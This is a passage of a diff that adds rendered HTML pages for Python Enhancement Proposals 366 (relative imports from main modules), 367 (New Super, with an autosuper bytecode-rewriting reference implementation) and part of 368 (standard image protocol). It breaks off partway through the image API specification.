The current inability to use explicit relative imports from the main +module is the subject of at least one open SF bug report (#1510172) [1], +and has most likely been a factor in at least a few queries on +comp.lang.python (such as Alan Isaac’s question in [2]).

+

This PEP is intended to provide a solution which permits explicit +relative imports from main modules, without incurring any significant +costs during interpreter startup or normal module import.

+

The section in PEP 338 on relative imports and the main module provides +further details and background on this problem.

+
+
+

Reference Implementation

+

Rev 47142 in SVN implemented an early variant of this proposal +which stored the main module’s real module name in the +__module_name__ attribute. It was reverted due to the fact +that 2.5 was already in beta by that time.

+

Patch 1487 [4] is the proposed implementation for this PEP.

+
+
+

Alternative Proposals

+

PEP 3122 proposed addressing this problem by changing the way +the main module is identified. That’s a significant compatibility cost +to incur to fix something that is a pretty minor bug in the overall +scheme of things, and the PEP was rejected [3].

+

The advantage of the proposal in this PEP is that its only impact on +normal code is the small amount of time needed to set the extra +attribute when importing a module. Relative imports themselves should +be sped up fractionally, as the package name is cached in the module +globals, rather than having to be worked out again for each relative +import.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0366.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0367/index.html b/pep-0367/index.html new file mode 100644 index 00000000000..6bd31525206 --- /dev/null +++ b/pep-0367/index.html @@ -0,0 +1,712 @@ + + + + + + + + PEP 367 – New Super | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 367 – New Super

+
+
Author:
+
Calvin Spealman <ironfroggy at gmail.com>, +Tim Delaney <timothy.c.delaney at gmail.com>
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Created:
+
28-Apr-2007
+
Python-Version:
+
2.6
+
Post-History:
+
28-Apr-2007, +29-Apr-2007, +29-Apr-2007, +14-May-2007
+
+
+
+
Table of Contents +
+
+

Numbering Note

+

This PEP has been renumbered to PEP 3135. The text below is the last +version submitted under the old number.

+
+
+

Abstract

+

This PEP proposes syntactic sugar for use of the super type to automatically +construct instances of the super type binding to the class that a method was +defined in, and the instance (or class object for classmethods) that the method +is currently acting upon.

+

The premise of the new super usage suggested is as follows:

+
super.foo(1, 2)
+
+
+

to replace the old:

+
super(Foo, self).foo(1, 2)
+
+
+

and the current __builtin__.super be aliased to __builtin__.__super__ +(with __builtin__.super to be removed in Python 3.0).

+

It is further proposed that assignment to super become a SyntaxError, +similar to the behaviour of None.

+
+
+

Rationale

+

The current usage of super requires an explicit passing of both the class and +instance it must operate from, requiring a breaking of the DRY (Don’t Repeat +Yourself) rule. This hinders any change in class name, and is often considered +a wart by many.

+
+
+

Specification

+

Within the specification section, some special terminology will be used to +distinguish similar and closely related concepts. “super type” will refer to +the actual builtin type named “super”. A “super instance” is simply an instance +of the super type, which is associated with a class and possibly with an +instance of that class.

+

Because the new super semantics are not backwards compatible with Python +2.5, the new semantics will require a __future__ import:

+
from __future__ import new_super
+
+
+

The current __builtin__.super will be aliased to __builtin__.__super__. +This will occur regardless of whether the new super semantics are active. +It is not possible to simply rename __builtin__.super, as that would affect +modules that do not use the new super semantics. In Python 3.0 it is +proposed that the name __builtin__.super will be removed.

+

Replacing the old usage of super, calls to the next class in the MRO (method +resolution order) can be made without explicitly creating a super +instance (although doing so will still be supported via __super__). Every +function will have an implicit local named super. This name behaves +identically to a normal local, including use by inner functions via a cell, +with the following exceptions:

+
    +
  1. Assigning to the name super will raise a SyntaxError at compile time;
  2. +
  3. Calling a static method or normal function that accesses the name super +will raise a TypeError at runtime.
  4. +
+

Every function that uses the name super, or has an inner function that +uses the name super, will include a preamble that performs the equivalent +of:

+
super = __builtin__.__super__(<class>, <instance>)
+
+
+

where <class> is the class that the method was defined in, and +<instance> is the first parameter of the method (normally self for +instance methods, and cls for class methods). For static methods and normal +functions, <class> will be None, resulting in a TypeError being +raised during the preamble.

+

Note: The relationship between super and __super__ is similar to that +between import and __import__.

+

Much of this was discussed in the thread of the python-dev list, “Fixing super +anyone?” [1].

+
+

Open Issues

+
+

Determining the class object to use

+

The exact mechanism for associating the method with the defining class is not +specified in this PEP, and should be chosen for maximum performance. For +CPython, it is suggested that the class instance be held in a C-level variable +on the function object which is bound to one of NULL (not part of a class), +Py_None (static method) or a class object (instance or class method).

+
+
+

Should super actually become a keyword?

+

With this proposal, super would become a keyword to the same extent that +None is a keyword. It is possible that further restricting the super +name may simplify implementation, however some are against the actual +keyword-ization of super. The simplest solution is often the correct solution +and the simplest solution may well not be adding additional keywords to the +language when they are not needed. Still, it may solve other open issues.

+
+
+
+

Closed Issues

+
+

super used with __call__ attributes

+

It was considered that it might be a problem that instantiating super instances +the classic way, because calling it would lookup the __call__ attribute and +thus try to perform an automatic super lookup to the next class in the MRO. +However, this was found to be false, because calling an object only looks up +the __call__ method directly on the object’s type. The following example shows +this in action.

+
class A(object):
+    def __call__(self):
+        return '__call__'
+    def __getattribute__(self, attr):
+        if attr == '__call__':
+            return lambda: '__getattribute__'
+a = A()
+assert a() == '__call__'
+assert a.__call__() == '__getattribute__'
+
+
+

In any case, with the renaming of __builtin__.super to +__builtin__.__super__ this issue goes away entirely.

+
+
+
+
+

Reference Implementation

+

It is impossible to implement the above specification entirely in Python. This +reference implementation has the following differences to the specification:

+
    +
  1. New super semantics are implemented using bytecode hacking.
  2. +
  3. Assignment to super is not a SyntaxError. Also see point #4.
  4. +
  5. Classes must either use the metaclass autosuper_meta or inherit from +the base class autosuper to acquire the new super semantics.
  6. +
  7. super is not an implicit local variable. In particular, for inner +functions to be able to use the super instance, there must be an assignment +of the form super = super in the method.
  8. +
+

The reference implementation assumes that it is being run on Python 2.5+.

+
#!/usr/bin/env python
+#
+# autosuper.py
+
+from array import array
+import dis
+import new
+import types
+import __builtin__
+__builtin__.__super__ = __builtin__.super
+del __builtin__.super
+
+# We need these for modifying bytecode
+from opcode import opmap, HAVE_ARGUMENT, EXTENDED_ARG
+
+LOAD_GLOBAL = opmap['LOAD_GLOBAL']
+LOAD_NAME = opmap['LOAD_NAME']
+LOAD_CONST = opmap['LOAD_CONST']
+LOAD_FAST = opmap['LOAD_FAST']
+LOAD_ATTR = opmap['LOAD_ATTR']
+STORE_FAST = opmap['STORE_FAST']
+LOAD_DEREF = opmap['LOAD_DEREF']
+STORE_DEREF = opmap['STORE_DEREF']
+CALL_FUNCTION = opmap['CALL_FUNCTION']
+STORE_GLOBAL = opmap['STORE_GLOBAL']
+DUP_TOP = opmap['DUP_TOP']
+POP_TOP = opmap['POP_TOP']
+NOP = opmap['NOP']
+JUMP_FORWARD = opmap['JUMP_FORWARD']
+ABSOLUTE_TARGET = dis.hasjabs
+
+def _oparg(code, opcode_pos):
+    return code[opcode_pos+1] + (code[opcode_pos+2] << 8)
+
+def _bind_autosuper(func, cls):
+    co = func.func_code
+    name = func.func_name
+    newcode = array('B', co.co_code)
+    codelen = len(newcode)
+    newconsts = list(co.co_consts)
+    newvarnames = list(co.co_varnames)
+
+    # Check if the global 'super' keyword is already present
+    try:
+        sn_pos = list(co.co_names).index('super')
+    except ValueError:
+        sn_pos = None
+
+    # Check if the varname 'super' keyword is already present
+    try:
+        sv_pos = newvarnames.index('super')
+    except ValueError:
+        sv_pos = None
+
+    # Check if the cellvar 'super' keyword is already present
+    try:
+        sc_pos = list(co.co_cellvars).index('super')
+    except ValueError:
+        sc_pos = None
+
+    # If 'super' isn't used anywhere in the function, we don't have anything to do
+    if sn_pos is None and sv_pos is None and sc_pos is None:
+        return func
+
+    c_pos = None
+    s_pos = None
+    n_pos = None
+
+    # Check if the 'cls_name' and 'super' objects are already in the constants
+    for pos, o in enumerate(newconsts):
+        if o is cls:
+            c_pos = pos
+
+        if o is __super__:
+            s_pos = pos
+
+        if o == name:
+            n_pos = pos
+
+    # Add in any missing objects to constants and varnames
+    if c_pos is None:
+        c_pos = len(newconsts)
+        newconsts.append(cls)
+
+    if n_pos is None:
+        n_pos = len(newconsts)
+        newconsts.append(name)
+
+    if s_pos is None:
+        s_pos = len(newconsts)
+        newconsts.append(__super__)
+
+    if sv_pos is None:
+        sv_pos = len(newvarnames)
+        newvarnames.append('super')
+
+    # This goes at the start of the function. It is:
+    #
+    #   super = __super__(cls, self)
+    #
+    # If 'super' is a cell variable, we store to both the
+    # local and cell variables (i.e. STORE_FAST and STORE_DEREF).
+    #
+    preamble = [
+        LOAD_CONST, s_pos & 0xFF, s_pos >> 8,
+        LOAD_CONST, c_pos & 0xFF, c_pos >> 8,
+        LOAD_FAST, 0, 0,
+        CALL_FUNCTION, 2, 0,
+    ]
+
+    if sc_pos is None:
+        # 'super' is not a cell variable - we can just use the local variable
+        preamble += [
+            STORE_FAST, sv_pos & 0xFF, sv_pos >> 8,
+        ]
+    else:
+        # If 'super' is a cell variable, we need to handle LOAD_DEREF.
+        preamble += [
+            DUP_TOP,
+            STORE_FAST, sv_pos & 0xFF, sv_pos >> 8,
+            STORE_DEREF, sc_pos & 0xFF, sc_pos >> 8,
+        ]
+
+    preamble = array('B', preamble)
+
+    # Bytecode for loading the local 'super' variable.
+    load_super = array('B', [
+        LOAD_FAST, sv_pos & 0xFF, sv_pos >> 8,
+    ])
+
+    preamble_len = len(preamble)
+    need_preamble = False
+    i = 0
+
+    while i < codelen:
+        opcode = newcode[i]
+        need_load = False
+        remove_store = False
+
+        if opcode == EXTENDED_ARG:
+            raise TypeError("Cannot use 'super' in function with EXTENDED_ARG opcode")
+
+        # If the opcode is an absolute target it needs to be adjusted
+        # to take into account the preamble.
+        elif opcode in ABSOLUTE_TARGET:
+            oparg = _oparg(newcode, i) + preamble_len
+            newcode[i+1] = oparg & 0xFF
+            newcode[i+2] = oparg >> 8
+
+        # If LOAD_GLOBAL(super) or LOAD_NAME(super) then we want to change it into
+        # LOAD_FAST(super)
+        elif (opcode == LOAD_GLOBAL or opcode == LOAD_NAME) and _oparg(newcode, i) == sn_pos:
+            need_preamble = need_load = True
+
+        # If LOAD_FAST(super) then we just need to add the preamble
+        elif opcode == LOAD_FAST and _oparg(newcode, i) == sv_pos:
+            need_preamble = need_load = True
+
+        # If LOAD_DEREF(super) then we change it into LOAD_FAST(super) because
+        # it's slightly faster.
+        elif opcode == LOAD_DEREF and _oparg(newcode, i) == sc_pos:
+            need_preamble = need_load = True
+
+        if need_load:
+            newcode[i:i+3] = load_super
+
+        i += 1
+
+        if opcode >= HAVE_ARGUMENT:
+            i += 2
+
+    # No changes needed - get out.
+    if not need_preamble:
+        return func
+
+    # Our preamble will have 3 things on the stack
+    co_stacksize = max(3, co.co_stacksize)
+
+    # Conceptually, our preamble is on the `def` line.
+    co_lnotab = array('B', co.co_lnotab)
+
+    if co_lnotab:
+        co_lnotab[0] += preamble_len
+
+    co_lnotab = co_lnotab.tostring()
+
+    # Our code consists of the preamble and the modified code.
+    codestr = (preamble + newcode).tostring()
+
+    codeobj = new.code(co.co_argcount, len(newvarnames), co_stacksize,
+                       co.co_flags, codestr, tuple(newconsts), co.co_names,
+                       tuple(newvarnames), co.co_filename, co.co_name,
+                       co.co_firstlineno, co_lnotab, co.co_freevars,
+                       co.co_cellvars)
+
+    func.func_code = codeobj
+    func.func_class = cls
+    return func
+
+class autosuper_meta(type):
+    def __init__(cls, name, bases, clsdict):
+        UnboundMethodType = types.UnboundMethodType
+
+        for v in vars(cls):
+            o = getattr(cls, v)
+            if isinstance(o, UnboundMethodType):
+                _bind_autosuper(o.im_func, cls)
+
+class autosuper(object):
+    __metaclass__ = autosuper_meta
+
+if __name__ == '__main__':
+    class A(autosuper):
+        def f(self):
+            return 'A'
+
+    class B(A):
+        def f(self):
+            return 'B' + super.f()
+
+    class C(A):
+        def f(self):
+            def inner():
+                return 'C' + super.f()
+
+            # Needed to put 'super' into a cell
+            super = super
+            return inner()
+
+    class D(B, C):
+        def f(self, arg=None):
+            var = None
+            return 'D' + super.f()
+
+    assert D().f() == 'DBCA'
+
+
+

Disassembly of B.f and C.f reveals the different preambles used when super +is simply a local variable compared to when it is used by an inner function.

+
>>> dis.dis(B.f)
+
+214           0 LOAD_CONST               4 (<type 'super'>)
+              3 LOAD_CONST               2 (<class '__main__.B'>)
+              6 LOAD_FAST                0 (self)
+              9 CALL_FUNCTION            2
+             12 STORE_FAST               1 (super)
+
+215          15 LOAD_CONST               1 ('B')
+             18 LOAD_FAST                1 (super)
+             21 LOAD_ATTR                1 (f)
+             24 CALL_FUNCTION            0
+             27 BINARY_ADD
+             28 RETURN_VALUE
+
+
+
>>> dis.dis(C.f)
+
+218           0 LOAD_CONST               4 (<type 'super'>)
+              3 LOAD_CONST               2 (<class '__main__.C'>)
+              6 LOAD_FAST                0 (self)
+              9 CALL_FUNCTION            2
+             12 DUP_TOP
+             13 STORE_FAST               1 (super)
+             16 STORE_DEREF              0 (super)
+
+219          19 LOAD_CLOSURE             0 (super)
+             22 LOAD_CONST               1 (<code object inner at 00C160A0, file "autosuper.py", line 219>)
+             25 MAKE_CLOSURE             0
+             28 STORE_FAST               2 (inner)
+
+223          31 LOAD_FAST                1 (super)
+             34 STORE_DEREF              0 (super)
+
+224          37 LOAD_FAST                2 (inner)
+             40 CALL_FUNCTION            0
+             43 RETURN_VALUE
+
+
+

Note that in the final implementation, the preamble would not be part of the +bytecode of the method, but would occur immediately following unpacking of +parameters.

+
+
+

Alternative Proposals

+
+

No Changes

+

Although its always attractive to just keep things how they are, people have +sought a change in the usage of super calling for some time, and for good +reason, all mentioned previously.

+
    +
  • Decoupling from the class name (which might not even be bound to the +right class anymore!)
  • +
  • Simpler looking, cleaner super calls would be better
  • +
+
+
+

Dynamic attribute on super type

+

The proposal adds a dynamic attribute lookup to the super type, which will +automatically determine the proper class and instance parameters. Each super +attribute lookup identifies these parameters and performs the super lookup on +the instance, as the current super implementation does with the explicit +invocation of a super instance upon a class and instance.

+

This proposal relies on sys._getframe(), which is not appropriate for anything +except a prototype implementation.

+
+
+

super(__this_class__, self)

+

This is nearly an anti-proposal, as it basically relies on the acceptance of +the __this_class__ PEP, which proposes a special name that would always be +bound to the class within which it is used. If that is accepted, __this_class__ +could simply be used instead of the class’ name explicitly, solving the name +binding issues [2].

+
+
+

self.__super__.foo(*args)

+

The __super__ attribute is mentioned in this PEP in several places, and could +be a candidate for the complete solution, actually using it explicitly instead +of any super usage directly. However, double-underscore names are usually an +internal detail, and attempted to be kept out of everyday code.

+
+
+

super(self, *args) or __super__(self, *args)

+

This solution only solves the problem of the type indication, does not handle +differently named super methods, and is explicit about the name of the +instance. It is less flexible without being able to enacted on other method +names, in cases where that is needed. One use case this fails is where a +base-class has a factory classmethod and a subclass has two factory +classmethods, both of which needing to properly make super calls to the one +in the base-class.

+
+
+

super.foo(self, *args)

+

This variation actually eliminates the problems with locating the proper +instance, and if any of the alternatives were pushed into the spotlight, I +would want it to be this one.

+
+
+

super or super()

+

This proposal leaves no room for different names, signatures, or application +to other classes, or instances. A way to allow some similar use alongside the +normal proposal would be favorable, encouraging good design of multiple +inheritance trees and compatible methods.

+
+
+

super(*p, **kw)

+

There has been the proposal that directly calling super(*p, **kw) would +be equivalent to calling the method on the super object with the same name +as the method currently being executed i.e. the following two methods would be +equivalent:

+
def f(self, *p, **kw):
+    super.f(*p, **kw)
+
+
+
def f(self, *p, **kw):
+    super(*p, **kw)
+
+
+

There is strong sentiment for and against this, but implementation and style +concerns are obvious. Guido has suggested that this should be excluded from +this PEP on the principle of KISS (Keep It Simple Stupid).

+
+
+
+

History

+
+
29-Apr-2007 - Changed title from “Super As A Keyword” to “New Super”
    +
  • Updated much of the language and added a terminology section +for clarification in confusing places.
  • +
  • Added reference implementation and history sections.
  • +
+
+
06-May-2007 - Updated by Tim Delaney to reflect discussions on the python-3000
and python-dev mailing lists.
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0367.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0368/index.html b/pep-0368/index.html new file mode 100644 index 00000000000..d820fde4548 --- /dev/null +++ b/pep-0368/index.html @@ -0,0 +1,971 @@ + + + + + + + + PEP 368 – Standard image protocol and class | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 368 – Standard image protocol and class

+
+
Author:
+
Lino Mastrodomenico <l.mastrodomenico at gmail.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
28-Jun-2007
+
Python-Version:
+
2.6, 3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

The current situation of image storage and manipulation in the Python +world is extremely fragmented: almost every library that uses image +objects has implemented its own image class, incompatible with +everyone else’s and often not very pythonic. A basic RGB image class +exists in the standard library (Tkinter.PhotoImage), but is pretty +much unusable, and unused, for anything except Tkinter programming.

+

This fragmentation not only takes up valuable space in the developers +minds, but also makes the exchange of images between different +libraries (needed in relatively common use cases) slower and more +complex than it needs to be.

+

This PEP proposes to improve the situation by defining a simple and +pythonic image protocol/interface that can be hopefully accepted and +implemented by existing image classes inside and outside the standard +library without breaking backward compatibility with their existing +user bases. In practice this is a definition of how a minimal +image-like object should look and act (in a similar way to the +read() and write() methods in file-like objects).

+

The inclusion in the standard library of a class that provides basic +image manipulation functionality and implements the new protocol is +also proposed, together with a mixin class that helps adding support +for the protocol to existing image classes.

+
+
+

PEP Deferral

+

Further exploration of the concepts covered in this PEP has been deferred +for lack of a current champion interested in promoting the goals of the PEP +and collecting and incorporating feedback, and with sufficient available +time to do so effectively.

+
+
+

Rationale

+

A good way to have high quality modules ready for inclusion in the +Python standard library is to simply wait for natural selection among +competing external libraries to provide a clear winner with useful +functionality and a big user base. Then the de facto standard can be +officially sanctioned by including it in the standard library.

+

Unfortunately this approach hasn’t worked well for the creation of a +dominant image class in the Python world: almost every third-party +library that requires an image object creates its own class +incompatible with the ones from other libraries. This is a real +problem because it’s entirely reasonable for a program to create and +manipulate an image using, e.g., PIL (the Python Imaging Library) and +then display it using wxPython or pygame. But these libraries have +different and incompatible image classes, and the usual solution is to +manually “export” an image from the source to a (width, height, +bytes_string) tuple and “import” it creating a new instance in the +target format. This approach works, but is both uglier and slower +than it needs to be.

+

Another “solution” that has been sometimes used is the creation of +specific adapters and/or converters from a class to another (e.g. PIL +offers the ImageTk module for converting PIL images to a class +compatible with the Tkinter one). But this approach doesn’t scale +well with the number of libraries involved and it’s still annoying for +the user: if I have a perfectly good image object why should I convert +before passing it to the next method, why can’t it simply accept my +image as-is?

+

The problem isn’t by any stretch limited to the three mentioned +libraries and has probably multiple causes, including two that IMO are +very important to understand before solving it:

+
    +
  • in today’s computing world an image is a basic type not strictly +tied to a specific domain. This is why there will never be a clear +winner between the image classes from the three libraries mentioned +above (PIL, wxPython and pygame): they cover different domains and +don’t really compete with each other;
  • +
  • the Python standard library has never provided a good image class +that can be adopted or imitated by third part modules. +Tkinter.PhotoImage provides basic RGB functionality, but it’s by +far the slowest and ugliest of the bunch and it can be instantiated +only after the Tkinter root window has been created.
  • +
+

This PEP tries to improve this situation in four ways:

+
    +
  1. It defines a simple and pythonic image protocol/interface (both on +the Python and the C side) that can be hopefully accepted and +implemented by existing image classes inside and outside the +standard library without breaking backward compatibility with +their existing user bases.
  2. +
  3. It proposes the inclusion in the standard library of three new +classes:
      +
    • ImageMixin provides almost everything necessary to implement +the new protocol; its main purpose is to make as simple as +possible to support this interface for existing libraries, in +some cases as simple as adding it to the list of base classes and +doing minor additions to the constructor.
    • +
    • Image is a subclass of ImageMixin and will add a +constructor that can resize and/or convert an image between +different pixel formats. This is intended to provide a fast and +efficient default implementation of the new protocol.
    • +
    • ImageSize is a minor helper class. See below for details.
    • +
    +
  4. +
  5. Tkinter.PhotoImage will implement the new protocol (mostly +through the ImageMixin class) and all the Tkinter methods that +can receive an image will be modified the accept any object that +implements the interface. As an aside the author of this PEP will +collaborate with the developers of the most common external +libraries to achieve the same goal (supporting the protocol in +their classes and accepting any class that implements it).
  6. +
  7. New PyImage_* functions will be added to the CPython C API: +they implement the C side of the protocol and accept as first +parameter any object that supports it, even if it isn’t an +instance of the Image/ImageMixin classes.
  8. +
+

The main effects for the end user will be a simplification of the +interchange of images between different libraries (if everything goes +well, any Python library will accept images from any other library) +and the out-of-the-box availability of the new Image class. The +new class is intended to cover simple but common use cases like +cropping and/or resizing a photograph to the desired size and passing +it an appropriate widget for displaying it on a window, or darkening a +texture and passing it to a 3D library.

+

The Image class is not intended to replace or compete with PIL, +Pythonmagick or NumPy, even if it provides a (very small) subset of +the functionality of these three libraries. In particular PIL offers +very rich image manipulation features with dozens of classes, +filters, transformations and file formats. The inclusion of PIL (or +something similar) in the standard library may, or may not, be a +worthy goal but it’s completely outside the scope of this PEP.

+
+
+

Specification

+

The imageop module is used as the default location for the new +classes and objects because it has for a long time hosted functions +that provided a somewhat similar functionality, but a new module may +be created if preferred (e.g. a new “image” or “media” module; +the latter may eventually include other multimedia classes).

+

MODES is a new module level constant: it is a set of the pixel +formats supported by the Image class. Any image object that +implements the new protocol is guaranteed to be formatted in one of +these modes, but libraries that accept images are allowed to support +only a subset of them.

+

These modes are in turn also available as module level constants (e.g. +imageop.RGB).

+

The following table is a summary of the modes currently supported and +their properties:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameComponent +namesBits per +componentSubsamplingValid +intervals
Ll (lowercase L)8nofull range
L16l16nofull range
L32l32nofull range
LAl, a8nofull range
LA32l, a16nofull range
RGBr, g, b8nofull range
RGB48r, g, b16nofull range
RGBAr, g, b, a8nofull range
RGBA64r, g, b, a16nofull range
YV12y, cr, cb81, 2, 216-235, 16-240, 16-240
JPEG_YV12y, cr, cb81, 2, 2full range
CMYKc, m, y, k8nofull range
CMYK64c, m, y, k16nofull range
+

When the name of a mode ends with a number, it represents the average +number of bits per pixel. All the other modes simply use a byte per +component per pixel.

+

No palette modes or modes with less than 8 bits per component are +supported. Welcome to the 21st century.

+

Here’s a quick description of the modes and the rationale for their +inclusion; there are four groups of modes:

+
    +
  1. grayscale (L* modes): they are heavily used in scientific +computing (those people may also need a very high dynamic range and +precision, hence L32, the only mode with 32 bits per component) +and sometimes it can be useful to consider a single component of a +color image as a grayscale image (this is used by the individual +planes of the planar images, see YV12 below); the name of the +component ('l', lowercase letter L) stands for luminance, the +second optional component ('a') is the alpha value and +represents the opacity of the pixels: alpha = 0 means full +transparency, alpha = 255/65535 represents a fully opaque pixel;
  2. +
  3. RGB* modes: the garden variety color images. The optional +alpha component has the same meaning as in grayscale modes;
  4. +
  5. YCbCr, a.k.a. YUV (*YV12 modes). These modes are planar +(i.e. the values of all the pixel for each component are stored in +a consecutive memory area, instead of the usual arrangement where +all the components of a pixel reside in consecutive bytes) and use +a 1, 2, 2 (a.k.a. 4:2:0) subsampling (i.e. each pixel has its own Y +value, but the Cb and Cr components are shared between groups of +2x2 adjacent pixels) because this is the format that’s by far the +most common for YCbCr images. Please note that the V (Cr) plane is +stored before the U (Cb) plane.

    YV12 is commonly used for MPEG2 (including DVDs), MPEG4 (both +ASP/DivX and AVC/H.264) and Theora video frames. Valid values for +Y are in range(16, 236) (excluding 236), and valid values for Cb +and Cr are in range(16, 241). JPEG_YV12 is similar to +YV12, but the three components can have the full range of 256 +values. It’s the native format used by almost all JPEG/JFIF files +and by MJPEG video frames. The “strangeness” of these two wrt all +the other supported modes derives from the fact that they are +widely used that way by a lot of existing libraries and +applications; this is also the reason why they are included (and +the fact that they can’t losslessly converted to RGB because YCbCr +is a bigger color space); the funny 4:2:0 planar arrangement of the +pixel values is relatively easy to support because in most cases +the three planes can be considered three separate grayscale images;

    +
  6. +
  7. CMYK* modes (cyan, magenta, yellow and black) are subtractive +color modes, used for printing color images on dead trees. +Professional designers love to pretend that they can’t live without +them, so here they are.
  8. +
+
+

Python API

+

See the examples below.

+

In Python 2.x, all the new classes defined here are new-style classes.

+
+

Mode Objects

+

The mode objects offer a number of attributes and methods that can be +used for implementing generic algorithms that work on different types +of images:

+

components

+
+
The number of components per pixel (e.g. 4 for an RGBA image).
+

component_names

+
+
A tuple of strings; see the column “Component names” in the above +table.
+

bits_per_component

+
+
8, 16 or 32; see “Bits per component” in the above table.
+

bytes_per_pixel

+
+
components * bits_per_component // 8, only available for non +planar modes (see below).
+

planar

+
+
Boolean; True if the image components reside each in a +separate plane. Currently this happens if and only if the mode +uses subsampling.
+

subsampling

+
+
A tuple that for each component in the mode contains a tuple of +two integers that represent the amount of downsampling in the +horizontal and vertical direction, respectively. In practice it’s +((1, 1), (2, 2), (2, 2)) for YV12 and JPEG_YV12 and +((1, 1),) * components for everything else.
+

x_divisor

+
+
max(x for x, y in subsampling); the width of an image that +uses this mode must be divisible for this value.
+

y_divisor

+
+
max(y for x, y in subsampling); the height of an image that +uses this mode must be divisible for this value.
+

intervals

+
+
A tuple that for each component in the mode contains a tuple of +two integers: the minimum and maximum valid value for the +component. Its value is ((16, 235), (16, 240), (16, 240)) for +YV12 and ((0, 2 ** bits_per_component - 1),) * components +for everything else.
+

get_length(iterable[integer]) -> int

+
+
The parameter must be an iterable that contains two integers: the +width and height of an image; it returns the number of bytes +needed to store an image of these dimensions with this mode.
+

Implementation detail: the modes are instances of a subclass of +str and have a value equal to their name (e.g. imageop.RGB == +'RGB') except for L32 that has value 'I'. This is only +intended for backward compatibility with existing PIL users; new code +that uses the image protocol proposed here should not rely on this +detail.

+
+
+

Image Protocol

+

Any object that supports the image protocol must provide the following +methods and attributes:

+

mode

+
+
The format and the arrangement of the pixels in this image; it’s +one of the constants in the MODES set.
+

size

+
+
An instance of the ImageSize class; it’s a named tuple of two +integers: the width and the height of the image in pixels; both of +them must be >= 1 and can also be accessed as the width and +height attributes of size.
+

buffer

+
+
A sequence of integers between 0 and 255; they are the actual +bytes used for storing the image data (i.e. modifying their values +affects the image pixels and vice versa); the data has a +row-major/C-contiguous order without padding and without any +special memory alignment, even when there are more than 8 bits per +component. The only supported methods are __len__, +__getitem__/__setitem__ (with both integers and slice +indexes) and __iter__; on the C side it implements the buffer +protocol.

This is a pretty low level interface to the image and the user is +responsible for using the correct (native) byte order for modes +with more than 8 bit per component and the correct value ranges +for YV12 images. A buffer may or may not keep a reference to +its image, but it’s still safe (if useless) to use the buffer even +after the corresponding image has been destroyed by the garbage +collector (this will require changes to the image class of +wxPython and possibly other libraries). Implementation detail: +this can be an array('B'), a bytes() object or a +specialized fixed-length type.

+
+

info

+
+
A dict object that can contain arbitrary metadata associated +with the image (e.g. DPI, gamma, ICC profile, exposure time…); +the interpretation of this data is beyond the scope of this PEP +and probably depends on the library used to create and/or to save +the image; if a method of the image returns a new image, it can +copy or adapt metadata from its own info attribute (the +ImageMixin implementation always creates a new image with an +empty info dictionary).
+
+
bits_per_component
+
bytes_per_pixel
+
component_names
+
components
+
intervals
+
planar
+
subsampling
+
+
+
Shortcuts for the corresponding mode.* attributes.
+

map(function[, function...]) -> None

+
+
For every pixel in the image, maps each component through the +corresponding function. If only one function is passed, it is +used repeatedly for each component. This method modifies the +image in place and is usually very fast (most of the time the +functions are called only a small number of times, possibly only +once for simple functions without branches), but it imposes a +number of restrictions on the function(s) passed:
    +
  • it must accept a single integer argument and return a number +(map will round the result to the nearest integer and clip +it to range(0, 2 ** bits_per_component), if necessary);
  • +
  • it must not try to intercept any BaseException, +Exception or any unknown subclass of Exception raised by +any operation on the argument (implementations may try to +optimize the speed by passing funny objects, so even a simple +"if n == 10:" may raise an exception: simply ignore it, +map will take care of it); catching any other exception is +fine;
  • +
  • it should be side-effect free and its result should not depend +on values (other than the argument) that may change during a +single invocation of map.
  • +
+
+
+
rotate90() -> image
+
rotate180() -> image
+
rotate270() -> image
+
+
+
Return a copy of the image rotated 90, 180 or 270 degrees +counterclockwise around its center.
+

clip() -> None

+
+
Saturates invalid component values in YV12 images to the +minimum or the maximum allowed (see mode.intervals), for other +image modes this method does nothing, very fast; libraries that +save/export YV12 images are encouraged to always call this +method, since intermediate operations (e.g. the map method) +may assign to pixels values outside the valid intervals.
+

split() -> tuple[image]

+
+
Returns a tuple of L, L16 or L32 images corresponding +to the individual components in the image.
+

Planar images also supports attributes with the same names defined in +component_names: they contain grayscale (mode L) images that +offer a view on the pixel values for the corresponding component; any +change to the subimages is immediately reflected on the parent image +and vice versa (their buffers refer to the same memory location).

+

Non-planar images offer the following additional methods:

+

pixels() -> iterator[pixel]

+
+
Returns an iterator that iterates over all the pixels in the +image, starting from the top line and scanning each line from left +to right. See below for a description of the pixel objects.
+

__iter__() -> iterator[line]

+
+
Returns an iterator that iterates over all the lines in the image, +from top to bottom. See below for a description of the line +objects.
+

__len__() -> int

+
+
Returns the number of lines in the image (size.height).
+

__getitem__(integer) -> line

+
+
Returns the line at the specified (y) position.
+

__getitem__(tuple[integer]) -> pixel

+
+
The parameter must be a tuple of two integers; they are +interpreted respectively as x and y coordinates in the image (0, 0 +is the top left corner) and a pixel object is returned.
+

__getitem__(slice | tuple[integer | slice]) -> image

+
+
The parameter must be a slice or a tuple that contains two slices +or an integer and a slice; the selected area of the image is +copied and a new image is returned; image[x:y:z] is equivalent +to image[:, x:y:z].
+

__setitem__(tuple[integer], integer | iterable[integer]) -> None

+
+
Modifies the pixel at specified position; image[x, y] = +integer is a shortcut for image[x, y] = (integer,) for +images with a single component.
+

__setitem__(slice | tuple[integer | slice], image) -> None

+
+
